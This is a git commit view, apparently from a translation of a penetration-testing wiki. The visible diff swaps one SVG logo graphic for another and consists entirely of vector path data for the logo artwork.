Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw

This commit is contained in:
Translator 2024-08-04 15:19:09 +00:00
parent 771c5b5781
commit b1a4df2bd7
17 changed files with 248 additions and 231 deletions

View file

@ -1,29 +1,42 @@
<svg width="796" height="313" viewBox="0 0 796 313" fill="none" xmlns="http://www.w3.org/2000/svg">
<rect width="796" height="313" rx="20" fill="#262626"/>
<g clip-path="url(#clip0_2558_1885)">
<path d="M559.476 215.161C556.326 215.161 553.887 214.188 552.162 212.232C550.436 210.285 549.583 207.475 549.583 203.803C549.583 200.191 550.446 197.381 552.162 195.375C553.887 193.368 556.295 192.365 559.386 192.365C563.971 192.365 566.761 194.371 567.734 198.385L584.34 196.84C583.658 193.227 582.203 190.127 579.995 187.548C577.788 184.97 574.938 183.033 571.436 181.739C567.935 180.444 563.861 179.802 559.215 179.802C558.714 179.802 558.232 179.832 557.74 179.852C549.583 188.813 541.144 197.502 532.425 205.92C532.666 210.074 533.739 213.716 535.636 216.847C537.813 220.429 540.894 223.138 544.887 224.974C548.87 226.811 553.596 227.724 559.045 227.724C566.62 227.724 572.641 226.108 577.116 222.857C581.591 219.616 584.26 214.961 585.113 208.88H568.336C567.644 213.064 564.694 215.161 559.476 215.161Z" fill="#FA8072"/>
<path d="M526.375 211.65C521.879 215.854 517.324 219.988 512.688 224.051C514.384 226.279 517.053 227.724 520.063 227.724C525.191 227.724 529.345 223.57 529.345 218.442C529.345 215.753 528.201 213.345 526.375 211.65Z" fill="#FA8072"/>
<path d="M728.937 184.317C725.977 181.307 721.843 179.802 716.505 179.802C709.11 179.802 703.14 182.501 698.605 187.889C697.28 185.251 695.364 183.244 692.835 181.869C690.307 180.495 687.277 179.802 683.715 179.802C677.233 179.802 671.754 182.351 667.279 187.458V181.177H650.583V226.349H667.62V201.746C667.62 199.448 668.483 197.442 670.199 195.726C671.112 194.753 672.166 194 673.34 193.488C674.514 192.977 675.738 192.716 677.002 192.716C679.3 192.716 680.945 193.288 681.949 194.442C682.952 195.585 683.454 197.422 683.454 199.95V226.369H700.491V201.244C700.491 199.178 701.354 197.291 703.07 195.565C705.077 193.669 707.344 192.726 709.873 192.726C712.171 192.726 713.816 193.318 714.819 194.492C715.823 195.666 716.325 197.492 716.325 199.96V226.379H733.362V196.95C733.362 191.562 731.887 187.358 728.937 184.348V184.317Z" fill="#FA8072"/>
<path d="M637.088 186.033C632.271 181.879 625.469 179.792 616.699 179.792C607.919 179.792 601.006 181.939 595.959 186.244C590.912 190.548 588.384 196.458 588.384 203.964C588.384 211.479 590.792 217.319 595.608 221.473C600.424 225.637 607.227 227.714 615.997 227.714C624.776 227.714 631.679 225.566 636.736 221.262C641.783 216.957 644.312 211.078 644.312 203.623C644.312 196.047 641.904 190.187 637.088 186.023V186.033ZM624.315 212.232C622.448 214.178 619.799 215.161 616.358 215.161C612.856 215.161 610.187 214.188 608.361 212.232C606.525 210.285 605.612 207.475 605.612 203.803C605.612 200.131 606.545 197.231 608.411 195.284C610.277 193.338 612.926 192.365 616.368 192.365C619.809 192.365 622.529 193.338 624.365 195.284C626.201 197.231 627.114 200.05 627.114 203.713C627.114 207.445 626.181 210.285 624.315 212.232Z" fill="#FA8072"/>
<path d="M489.069 194.973C488.557 193.368 487.554 192.194 486.059 191.452C484.564 190.709 482.507 190.338 479.868 190.338C477.289 190.338 475.282 190.639 473.848 191.241C472.413 191.843 471.7 192.716 471.7 193.86C471.7 194.893 472.262 195.696 473.376 196.268C474.5 196.84 476.396 197.301 479.095 197.642L485.286 198.505C490.674 199.248 494.818 200.201 497.718 201.345C500.608 202.489 502.665 203.964 503.869 205.77C505.073 207.576 505.675 209.944 505.675 212.864C505.675 217.74 503.578 221.433 499.394 223.961C495.21 226.48 489.079 227.744 480.992 227.744C472.904 227.744 466.172 226.429 461.817 223.79C457.462 221.152 454.994 217.198 454.422 211.92H470.336C471.369 215.242 474.831 216.907 480.741 216.907C483.49 216.907 485.587 216.606 487.022 216.004C488.457 215.402 489.169 214.499 489.169 213.295C489.169 212.262 488.627 211.489 487.534 210.977C486.44 210.466 484.524 210.034 481.774 209.683L476.095 208.91C471.048 208.218 467.055 207.265 464.095 206.031C461.145 204.796 459.008 203.221 457.683 201.305C456.359 199.388 455.706 196.99 455.706 194.121C455.706 189.595 457.824 186.083 462.068 183.585C466.312 181.087 472.242 179.842 479.868 179.842C487.263 179.842 492.972 180.936 496.986 183.113C500.999 185.291 503.578 188.762 504.722 193.518L489.069 194.983V194.973Z" fill="white"/>
<path d="M278.379 226.359V179.752H255.502V164.962H319.307V179.752H296.43V226.359H278.369H278.379Z" fill="white"/>
<path d="M365.673 203.663C365.673 211.118 363.145 216.988 358.108 221.292C353.061 225.597 346.157 227.744 337.378 227.744C328.608 227.744 321.815 225.667 316.999 221.513C312.183 217.359 309.775 211.519 309.775 204.014C309.775 196.509 312.293 190.599 317.34 186.294C322.387 181.99 329.291 179.842 338.07 179.842C346.84 179.842 353.633 181.919 358.449 186.073C363.265 190.227 365.673 196.097 365.673 203.663ZM348.475 203.753C348.475 200.081 347.552 197.271 345.726 195.325C343.89 193.378 341.221 192.405 337.729 192.405C334.237 192.405 331.638 193.378 329.772 195.325C327.906 197.271 326.973 200.111 326.973 203.843C326.973 207.516 327.886 210.325 329.722 212.272C331.558 214.218 334.217 215.191 337.719 215.191C341.161 215.191 343.809 214.218 345.676 212.272C347.542 210.325 348.475 207.486 348.475 203.753Z" fill="white"/>
<path d="M425.695 203.663C425.695 211.118 423.167 216.988 418.13 221.292C413.083 225.597 406.18 227.744 397.4 227.744C388.631 227.744 381.838 225.667 377.021 221.513C372.205 217.359 369.797 211.519 369.797 204.014C369.797 196.509 372.316 190.599 377.363 186.294C382.41 181.99 389.313 179.842 398.092 179.842C406.862 179.842 413.655 181.919 418.471 186.073C423.287 190.227 425.695 196.097 425.695 203.663ZM408.497 203.753C408.497 200.081 407.574 197.271 405.748 195.325C403.912 193.378 401.243 192.405 397.751 192.405C394.31 192.405 391.661 193.378 389.794 195.325C387.928 197.271 386.995 200.111 386.995 203.843C386.995 207.576 387.908 210.325 389.744 212.272C391.581 214.218 394.239 215.191 397.741 215.191C401.243 215.191 403.832 214.218 405.698 212.272C407.564 210.325 408.497 207.486 408.497 203.753Z" fill="white"/>
<path d="M431.967 226.359V164.962H448.994V226.359H431.967Z" fill="white"/>
<path d="M255.502 147.935V86.5381H285.945C295.115 86.5381 301.979 88.284 306.544 91.7858C311.099 95.2876 313.377 100.585 313.377 107.699C313.377 114.864 311.039 120.201 306.363 123.693C301.688 127.195 294.543 128.941 284.911 128.941H273.041V147.945H255.502V147.935ZM284.57 115.425C288.473 115.425 291.293 114.813 293.038 113.579C294.784 112.345 295.667 110.358 295.667 107.599C295.667 104.96 294.804 103.044 293.089 101.84C291.373 100.636 288.583 100.034 284.75 100.034H273.051V115.425H284.57Z" fill="white"/>
<path d="M331.528 129.362C331.819 132.172 332.923 134.309 334.839 135.774C336.756 137.239 339.415 137.971 342.796 137.971C348.244 137.971 351.566 136.456 352.77 133.416H368.513C366.165 144.022 357.445 149.33 342.375 149.33C333.826 149.33 327.214 147.293 322.508 143.219C317.802 139.145 315.454 133.386 315.454 125.931C315.454 121.175 316.538 116.941 318.725 113.248C320.902 109.546 324.053 106.656 328.187 104.559C332.311 102.472 337.187 101.418 342.806 101.418C351.114 101.418 357.566 103.465 362.151 107.569C366.737 111.673 369.034 117.472 369.034 124.988V129.372H331.538L331.528 129.362ZM353.201 120.332C352.91 115.175 349.358 112.596 342.535 112.596C339.726 112.596 337.338 113.308 335.351 114.743C333.374 116.178 332.21 118.044 331.869 120.332H353.191H353.201Z" fill="white"/>
<path d="M410.725 147.935V121.877C410.725 119.238 410.113 117.322 408.879 116.118C407.645 114.914 405.708 114.312 403.069 114.312C401.634 114.312 400.23 114.583 398.855 115.124C397.48 115.666 396.276 116.429 395.243 117.402C393.296 119.178 392.323 121.245 392.323 123.593V147.925H375.296V102.783H391.982V109.064C396.738 103.967 402.648 101.408 409.702 101.408C415.381 101.408 419.806 102.913 422.986 105.923C426.167 108.934 427.762 113.158 427.762 118.606V147.935H410.735H410.725Z" fill="white"/>
<path d="M471.359 146.641C467.005 148.075 462.329 148.788 457.342 148.788C450.92 148.788 446.265 147.443 443.365 144.744C440.465 142.055 439.02 137.66 439.02 131.59V115.165H430.421V102.783H439.02V90.9128H456.048V102.783H469.463V115.165H456.048V130.386C456.048 132.393 456.549 133.868 457.553 134.811C458.556 135.754 460.172 136.226 462.409 136.226C464.296 136.226 466.593 135.824 469.292 135.021L471.359 146.631V146.641Z" fill="white"/>
<path d="M488.898 129.362C489.179 132.172 490.283 134.309 492.209 135.774C494.126 137.239 496.785 137.971 500.166 137.971C505.614 137.971 508.936 136.456 510.14 133.416H525.873C523.525 144.022 514.805 149.33 499.735 149.33C491.196 149.33 484.574 147.293 479.868 143.219C475.162 139.145 472.814 133.386 472.814 125.931C472.814 121.175 473.898 116.941 476.085 113.248C478.262 109.546 481.413 106.656 485.547 104.559C489.681 102.472 494.547 101.418 500.166 101.418C508.474 101.418 514.926 103.465 519.511 107.569C524.097 111.673 526.394 117.472 526.394 124.988V129.372H488.898V129.362ZM510.571 120.332C510.28 115.175 506.728 112.596 499.905 112.596C497.096 112.596 494.698 113.308 492.721 114.743C490.744 116.178 489.58 118.044 489.239 120.332H510.561H510.571Z" fill="white"/>
<path d="M564.323 116.549C563.811 114.944 562.807 113.77 561.312 113.027C559.817 112.285 557.76 111.914 555.121 111.914C552.483 111.914 550.536 112.215 549.101 112.817C547.666 113.419 546.954 114.292 546.954 115.435C546.954 116.469 547.516 117.272 548.63 117.844C549.753 118.415 551.65 118.877 554.349 119.218L560.54 120.081C565.928 120.824 570.072 121.777 572.972 122.921C575.861 124.065 577.918 125.539 579.122 127.346C580.326 129.152 580.928 131.52 580.928 134.439C580.928 139.316 578.831 143.008 574.647 145.537C570.463 148.055 564.333 149.32 556.245 149.32C547.817 149.32 541.425 148.005 537.071 145.366C532.716 142.727 530.248 138.774 529.676 133.496H545.589C546.623 136.817 550.085 138.483 555.994 138.483C558.744 138.483 560.841 138.182 562.276 137.58C563.71 136.978 564.423 136.075 564.423 134.871C564.423 133.837 563.881 133.065 562.787 132.553C561.694 132.041 559.777 131.61 557.028 131.259L551.349 130.486C546.302 129.794 542.308 128.841 539.348 127.606C536.398 126.372 534.261 124.797 532.937 122.881C531.612 120.964 530.96 118.566 530.96 115.696C530.96 111.171 533.077 107.659 537.322 105.161C541.566 102.662 547.496 101.418 555.121 101.418C562.747 101.418 568.226 102.512 572.239 104.689C576.253 106.867 578.831 110.338 579.975 115.094L564.323 116.559V116.549Z" fill="white"/>
<path d="M622.88 146.641C618.525 148.075 613.849 148.788 608.863 148.788C602.441 148.788 597.785 147.443 594.886 144.744C591.986 142.055 590.541 137.66 590.541 131.59V115.165H581.942V102.783H590.541V90.9128H607.568V102.783H620.983V115.165H607.568V130.386C607.568 132.393 608.07 133.868 609.073 134.811C610.077 135.754 611.702 136.226 613.93 136.226C615.826 136.226 618.114 135.824 620.813 135.021L622.88 146.631V146.641Z" fill="white"/>
<path d="M137.264 77.4073L209.748 95.739C210.3 94.9664 210.852 94.2039 211.403 93.4313V93.4112C213.641 90.2405 215.848 87.0297 218.026 83.8088C218.357 83.3172 218.678 82.8255 219.009 82.3339C220.775 79.705 222.511 77.0561 224.237 74.3971C224.778 73.5643 225.32 72.7215 225.852 71.8786C227.397 69.4605 228.922 67.0223 230.437 64.574C230.969 63.7111 231.511 62.8482 232.043 61.9853C234.01 58.7645 235.956 55.5135 237.873 52.2525L238.264 51.51H235.675C226.414 60.8916 215.668 71.2967 205.674 79.9157L137.264 62.6174L62 81.6315L63.3646 96.0902L137.264 77.4073Z" fill="#FA8072"/>
<path d="M92.8138 216.255C133.983 185.01 170.546 148.236 201.661 106.776L137.264 90.5015L64.7393 108.833L69.405 158.069C71.4418 179.582 79.7097 199.729 92.8239 216.255H92.8138Z" fill="#2A76D1"/>
<path d="M77.2213 247.561C76.9303 247.781 76.6293 248.012 76.3383 248.233C73.5489 250.37 70.7294 252.477 67.8999 254.564V256.3C71.0907 255.046 74.2714 253.772 77.432 252.457L90.9275 246.597C98.3926 243.216 105.767 239.664 113.032 235.931C115.28 237.617 117.587 239.233 119.975 240.748L137.274 251.765L154.572 240.748C183.269 222.456 201.931 191.953 205.142 158.079L209.808 108.843L206.166 107.92C171.389 161.601 127.912 208.7 77.2213 247.561Z" fill="white"/>
</g>
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="550px" height="216px" viewBox="0 0 549 216" version="1.1">
<defs>
<clipPath id="clip0_2558_1885">
<rect width="671.362" height="204.8" fill="white" transform="translate(62 51.5)"/>
<clipPath id="clip1">
<path d="M 448 124 L 505.796875 124 L 505.796875 157 L 448 157 Z M 448 124 "/>
</clipPath>
<clipPath id="clip2">
<path d="M 42.761719 35.539062 L 165 35.539062 L 165 67 L 42.761719 67 Z M 42.761719 35.539062 "/>
</clipPath>
<clipPath id="clip3">
<path d="M 46 74 L 145 74 L 145 176.871094 L 46 176.871094 Z M 46 74 "/>
</clipPath>
</defs>
<g id="surface1">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(14.901961%,14.901961%,14.901961%);fill-opacity:1;" d="M 13.792969 0 L 535.207031 0 C 542.824219 0 549 6.179688 549 13.800781 L 549 202.199219 C 549 209.820312 542.824219 216 535.207031 216 L 13.792969 216 C 6.175781 216 0 209.820312 0 202.199219 L 0 13.800781 C 0 6.179688 6.175781 0 13.792969 0 Z M 13.792969 0 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 385.871094 148.480469 C 383.695312 148.480469 382.015625 147.808594 380.824219 146.460938 C 379.636719 145.117188 379.046875 143.175781 379.046875 140.644531 C 379.046875 138.152344 379.640625 136.210938 380.824219 134.828125 C 382.015625 133.441406 383.675781 132.75 385.808594 132.75 C 388.96875 132.75 390.894531 134.132812 391.566406 136.90625 L 403.019531 135.839844 C 402.546875 133.34375 401.542969 131.207031 400.023438 129.425781 C 398.5 127.648438 396.535156 126.308594 394.117188 125.417969 C 391.703125 124.523438 388.894531 124.082031 385.691406 124.082031 C 385.34375 124.082031 385.011719 124.101562 384.671875 124.113281 C 379.046875 130.300781 373.226562 136.296875 367.210938 142.105469 C 367.378906 144.972656 368.117188 147.484375 369.425781 149.644531 C 370.929688 152.117188 373.054688 153.988281 375.808594 155.253906 C 378.554688 156.519531 381.8125 157.152344 385.574219 157.152344 C 390.796875 157.152344 394.949219 156.035156 398.035156 153.792969 C 401.121094 151.554688 402.964844 148.34375 403.550781 144.148438 L 391.980469 144.148438 C 391.503906 147.035156 389.46875 148.480469 385.871094 148.480469 Z M 385.871094 148.480469 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 363.039062 146.058594 C 359.9375 148.960938 356.796875 151.8125 353.601562 154.617188 C 354.769531 156.152344 356.609375 157.152344 358.6875 157.152344 C 362.222656 157.152344 365.089844 154.285156 365.089844 150.746094 C 365.089844 148.890625 364.300781 147.226562 363.039062 146.058594 Z M 363.039062 146.058594 "/>
<g clip-path="url(#clip1)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 502.746094 127.195312 C 500.707031 125.121094 497.855469 124.082031 494.171875 124.082031 C 489.070312 124.082031 484.953125 125.941406 481.828125 129.660156 C 480.914062 127.839844 479.589844 126.457031 477.847656 125.507812 C 476.105469 124.558594 474.015625 124.082031 471.558594 124.082031 C 467.085938 124.082031 463.308594 125.839844 460.222656 129.363281 L 460.222656 125.03125 L 448.707031 125.03125 L 448.707031 156.203125 L 460.457031 156.203125 L 460.457031 139.222656 C 460.457031 137.636719 461.050781 136.253906 462.234375 135.070312 C 462.863281 134.398438 463.59375 133.878906 464.402344 133.523438 C 465.210938 133.171875 466.054688 132.992188 466.925781 132.992188 C 468.511719 132.992188 469.648438 133.386719 470.339844 134.183594 C 471.03125 134.972656 471.378906 136.238281 471.378906 137.984375 L 471.378906 156.214844 L 483.128906 156.214844 L 483.128906 138.878906 C 483.128906 137.453125 483.722656 136.148438 484.90625 134.957031 C 486.289062 133.648438 487.855469 133 489.597656 133 C 491.183594 133 492.316406 133.40625 493.007812 134.21875 C 493.703125 135.027344 494.046875 136.289062 494.046875 137.992188 L 494.046875 156.222656 L 505.796875 156.222656 L 505.796875 135.914062 C 505.796875 132.195312 504.78125 129.296875 502.746094 127.21875 Z M 502.746094 127.195312 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 439.398438 128.378906 C 436.078125 125.515625 431.386719 124.074219 425.335938 124.074219 C 419.28125 124.074219 414.511719 125.554688 411.03125 128.527344 C 407.550781 131.496094 405.808594 135.574219 405.808594 140.753906 C 405.808594 145.941406 407.46875 149.972656 410.789062 152.835938 C 414.113281 155.710938 418.804688 157.144531 424.851562 157.144531 C 430.90625 157.144531 435.667969 155.664062 439.15625 152.691406 C 442.636719 149.722656 444.382812 145.664062 444.382812 140.519531 C 444.382812 135.292969 442.71875 131.246094 439.398438 128.375 Z M 430.589844 146.460938 C 429.300781 147.804688 427.472656 148.480469 425.101562 148.480469 C 422.6875 148.480469 420.84375 147.808594 419.585938 146.460938 C 418.320312 145.117188 417.691406 143.175781 417.691406 140.644531 C 417.691406 138.109375 418.332031 136.109375 419.621094 134.765625 C 420.90625 133.421875 422.734375 132.75 425.109375 132.75 C 427.480469 132.75 429.355469 133.421875 430.625 134.765625 C 431.890625 136.109375 432.519531 138.054688 432.519531 140.582031 C 432.519531 143.15625 431.875 145.117188 430.589844 146.460938 Z M 430.589844 146.460938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.308594 134.550781 C 336.957031 133.441406 336.265625 132.632812 335.234375 132.121094 C 334.203125 131.609375 332.785156 131.351562 330.964844 131.351562 C 329.183594 131.351562 327.800781 131.558594 326.8125 131.976562 C 325.824219 132.390625 325.332031 132.992188 325.332031 133.78125 C 325.332031 134.496094 325.71875 135.050781 326.488281 135.445312 C 327.261719 135.839844 328.570312 136.15625 330.429688 136.390625 L 334.699219 136.988281 C 338.417969 137.5 341.273438 138.15625 343.273438 138.949219 C 345.269531 139.738281 346.6875 140.753906 347.519531 142 C 348.347656 143.246094 348.761719 144.882812 348.761719 146.898438 C 348.761719 150.261719 347.316406 152.808594 344.429688 154.554688 C 341.546875 156.292969 337.316406 157.164062 331.738281 157.164062 C 326.160156 157.164062 321.519531 156.257812 318.515625 154.4375 C 315.511719 152.617188 313.808594 149.886719 313.414062 146.246094 L 324.390625 146.246094 C 325.101562 148.539062 327.488281 149.6875 331.566406 149.6875 C 333.460938 149.6875 334.910156 149.480469 335.898438 149.0625 C 336.886719 148.648438 337.378906 148.023438 337.378906 147.195312 C 337.378906 146.480469 337.003906 145.949219 336.25 145.59375 C 335.496094 145.242188 334.175781 144.945312 332.277344 144.703125 L 328.363281 144.167969 C 324.882812 143.691406 322.128906 143.03125 320.085938 142.179688 C 318.050781 141.328125 316.578125 140.242188 315.664062 138.917969 C 314.75 137.597656 314.300781 135.941406 314.300781 133.960938 C 314.300781 130.839844 315.761719 128.414062 318.6875 126.691406 C 321.613281 124.96875 325.703125 124.109375 330.964844 124.109375 C 336.066406 124.109375 340.003906 124.863281 342.769531 126.367188 C 345.539062 127.867188 347.316406 130.265625 348.105469 133.546875 L 337.308594 134.558594 Z M 337.308594 134.550781 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 191.996094 156.210938 L 191.996094 124.046875 L 176.21875 124.046875 L 176.21875 113.839844 L 220.226562 113.839844 L 220.226562 124.046875 L 204.449219 124.046875 L 204.449219 156.210938 L 191.992188 156.210938 Z M 191.996094 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 252.203125 140.546875 C 252.203125 145.691406 250.460938 149.742188 246.988281 152.710938 C 243.503906 155.683594 238.742188 157.164062 232.6875 157.164062 C 226.640625 157.164062 221.957031 155.730469 218.632812 152.863281 C 215.3125 150 213.652344 145.96875 213.652344 140.789062 C 213.652344 135.609375 215.386719 131.53125 218.867188 128.5625 C 222.351562 125.589844 227.113281 124.109375 233.167969 124.109375 C 239.214844 124.109375 243.898438 125.542969 247.222656 128.410156 C 250.542969 131.273438 252.203125 135.324219 252.203125 140.546875 Z M 240.34375 140.609375 C 240.34375 138.074219 239.707031 136.136719 238.445312 134.792969 C 237.179688 133.449219 235.339844 132.777344 232.929688 132.777344 C 230.523438 132.777344 228.730469 133.449219 227.441406 134.792969 C 226.15625 136.136719 225.511719 138.097656 225.511719 140.671875 C 225.511719 143.207031 226.140625 145.144531 227.410156 146.488281 C 228.675781 147.832031 230.507812 148.503906 232.925781 148.503906 C 235.296875 148.503906 237.125 147.832031 238.414062 146.488281 C 239.699219 145.144531 240.34375 143.183594 240.34375 140.609375 Z M 240.34375 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 293.601562 140.546875 C 293.601562 145.691406 291.859375 149.742188 288.382812 152.710938 C 284.902344 155.683594 280.140625 157.164062 274.085938 157.164062 C 268.039062 157.164062 263.351562 155.730469 260.03125 152.863281 C 256.710938 150 255.046875 145.96875 255.046875 140.789062 C 255.046875 135.609375 256.785156 131.53125 260.265625 128.5625 C 263.746094 125.589844 268.507812 124.109375 274.5625 124.109375 C 280.613281 124.109375 285.296875 125.542969 288.617188 128.410156 C 291.941406 131.273438 293.601562 135.324219 293.601562 140.546875 Z M 281.738281 140.609375 C 281.738281 138.074219 281.101562 136.136719 279.84375 134.792969 C 278.578125 133.449219 276.738281 132.777344 274.328125 132.777344 C 271.953125 132.777344 270.128906 133.449219 268.839844 134.792969 C 267.554688 136.136719 266.910156 138.097656 266.910156 140.671875 C 266.910156 143.246094 267.539062 145.144531 268.804688 146.488281 C 270.074219 147.832031 271.90625 148.503906 274.320312 148.503906 C 276.738281 148.503906 278.523438 147.832031 279.808594 146.488281 C 281.097656 145.144531 281.738281 143.183594 281.738281 140.609375 Z M 281.738281 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 297.925781 156.210938 L 297.925781 113.839844 L 309.671875 113.839844 L 309.671875 156.210938 Z M 297.925781 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 176.21875 102.089844 L 176.21875 59.71875 L 197.214844 59.71875 C 203.539062 59.71875 208.273438 60.925781 211.421875 63.339844 C 214.566406 65.757812 216.136719 69.414062 216.136719 74.324219 C 216.136719 79.265625 214.523438 82.949219 211.296875 85.359375 C 208.074219 87.777344 203.144531 88.980469 196.503906 88.980469 L 188.316406 88.980469 L 188.316406 102.097656 L 176.21875 102.097656 Z M 196.265625 79.65625 C 198.960938 79.65625 200.90625 79.230469 202.109375 78.378906 C 203.3125 77.527344 203.921875 76.15625 203.921875 74.253906 C 203.921875 72.433594 203.324219 71.109375 202.144531 70.28125 C 200.960938 69.449219 199.035156 69.03125 196.390625 69.03125 L 188.324219 69.03125 L 188.324219 79.65625 Z M 196.265625 79.65625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 228.65625 89.273438 C 228.855469 91.210938 229.617188 92.6875 230.9375 93.695312 C 232.261719 94.707031 234.09375 95.214844 236.425781 95.214844 C 240.183594 95.214844 242.472656 94.167969 243.304688 92.070312 L 254.164062 92.070312 C 252.542969 99.390625 246.527344 103.050781 236.136719 103.050781 C 230.238281 103.050781 225.679688 101.644531 222.433594 98.835938 C 219.1875 96.023438 217.566406 92.050781 217.566406 86.90625 C 217.566406 83.621094 218.316406 80.699219 219.824219 78.152344 C 221.324219 75.597656 223.5 73.601562 226.351562 72.15625 C 229.195312 70.714844 232.558594 69.988281 236.433594 69.988281 C 242.164062 69.988281 246.613281 71.402344 249.773438 74.234375 C 252.9375 77.066406 254.523438 81.066406 254.523438 86.253906 L 254.523438 89.277344 L 228.660156 89.277344 Z M 243.601562 83.039062 C 243.402344 79.480469 240.953125 77.703125 236.246094 77.703125 C 234.308594 77.703125 232.660156 78.195312 231.292969 79.183594 C 229.925781 80.175781 229.125 81.460938 228.890625 83.039062 Z M 243.601562 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 283.277344 102.089844 L 283.277344 84.105469 C 283.277344 82.285156 282.855469 80.964844 282.003906 80.132812 C 281.152344 79.300781 279.816406 78.886719 277.996094 78.886719 C 277.007812 78.886719 276.039062 79.074219 275.089844 79.445312 C 274.140625 79.820312 273.3125 80.347656 272.597656 81.019531 C 271.253906 82.246094 270.585938 83.671875 270.585938 85.292969 L 270.585938 102.082031 L 258.839844 102.082031 L 258.839844 70.929688 L 270.347656 70.929688 L 270.347656 75.265625 C 273.628906 71.746094 277.707031 69.980469 282.570312 69.980469 C 286.488281 69.980469 289.539062 71.019531 291.734375 73.097656 C 293.925781 75.175781 295.027344 78.089844 295.027344 81.847656 L 295.027344 102.089844 Z M 283.277344 102.089844 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 325.09375 101.195312 C 322.09375 102.1875 318.867188 102.679688 315.429688 102.679688 C 311 102.679688 307.789062 101.75 305.789062 99.886719 C 303.789062 98.03125 302.792969 95 302.792969 90.808594 L 302.792969 79.476562 L 296.859375 79.476562 L 296.859375 70.929688 L 302.792969 70.929688 L 302.792969 62.738281 L 314.535156 62.738281 L 314.535156 70.929688 L 323.789062 70.929688 L 323.789062 79.476562 L 314.535156 79.476562 L 314.535156 89.980469 C 314.535156 91.363281 314.882812 92.382812 315.574219 93.03125 C 316.265625 93.683594 317.378906 94.007812 318.921875 94.007812 C 320.222656 94.007812 321.808594 93.730469 323.671875 93.175781 L 325.09375 101.1875 Z M 325.09375 101.195312 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.191406 89.273438 C 337.386719 91.210938 338.148438 92.6875 339.476562 93.695312 C 340.796875 94.707031 342.632812 95.214844 344.964844 95.214844 C 348.722656 95.214844 351.011719 94.167969 351.84375 92.070312 L 362.695312 92.070312 C 361.074219 99.390625 355.058594 103.050781 344.667969 103.050781 C 338.777344 103.050781 334.210938 101.644531 330.964844 98.835938 C 327.71875 96.023438 326.097656 92.050781 326.097656 86.90625 C 326.097656 83.621094 326.847656 80.699219 328.355469 78.152344 C 329.855469 75.597656 332.03125 73.601562 334.882812 72.15625 C 337.730469 70.714844 341.089844 69.988281 344.964844 69.988281 C 350.695312 69.988281 355.144531 71.402344 358.304688 74.234375 C 361.46875 77.066406 363.054688 81.066406 363.054688 86.253906 L 363.054688 89.277344 L 337.191406 89.277344 Z M 352.140625 83.039062 C 351.9375 79.480469 349.488281 77.703125 344.785156 77.703125 C 342.847656 77.703125 341.191406 78.195312 339.828125 79.183594 C 338.464844 80.175781 337.664062 81.460938 337.425781 83.039062 Z M 352.140625 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 389.210938 80.429688 C 388.859375 79.324219 388.167969 78.511719 387.136719 78 C 386.105469 77.488281 384.6875 77.230469 382.867188 77.230469 C 381.046875 77.230469 379.703125 77.4375 378.714844 77.855469 C 377.722656 78.269531 377.234375 78.871094 377.234375 79.660156 C 377.234375 80.375 377.621094 80.929688 378.390625 81.324219 C 379.164062 81.71875 380.472656 82.035156 382.332031 82.273438 L 386.605469 82.867188 C 390.320312 83.378906 393.179688 84.039062 395.179688 84.828125 C 397.171875 85.617188 398.589844 86.632812 399.417969 87.882812 C 400.25 89.128906 400.664062 90.761719 400.664062 92.777344 C 400.664062 96.140625 399.21875 98.6875 396.332031 100.433594 C 393.449219 102.171875 389.21875 103.046875 383.640625 103.046875 C 377.828125 103.046875 373.421875 102.136719 370.417969 100.316406 C 367.414062 98.496094 365.710938 95.765625 365.316406 92.125 L 376.292969 92.125 C 377.003906 94.417969 379.394531 95.566406 383.46875 95.566406 C 385.363281 95.566406 386.8125 95.359375 387.800781 94.945312 C 388.789062 94.527344 389.28125 93.90625 389.28125 93.074219 C 389.28125 92.359375 388.90625 91.828125 388.152344 91.472656 C 387.398438 91.121094 386.078125 90.824219 384.179688 90.582031 L 380.265625 90.046875 C 376.785156 89.570312 374.027344 88.914062 371.988281 88.058594 C 369.953125 87.207031 368.480469 86.121094 367.566406 84.800781 C 366.652344 83.476562 366.203125 81.820312 366.203125 79.839844 C 366.203125 76.71875 367.664062 74.296875 370.589844 72.570312 C 373.515625 70.847656 377.605469 69.988281 382.867188 69.988281 C 388.125 69.988281 391.90625 70.742188 394.671875 72.246094 C 397.441406 73.75 399.21875 76.144531 400.007812 79.425781 L 389.210938 80.4375 Z M 389.210938 80.429688 "/>
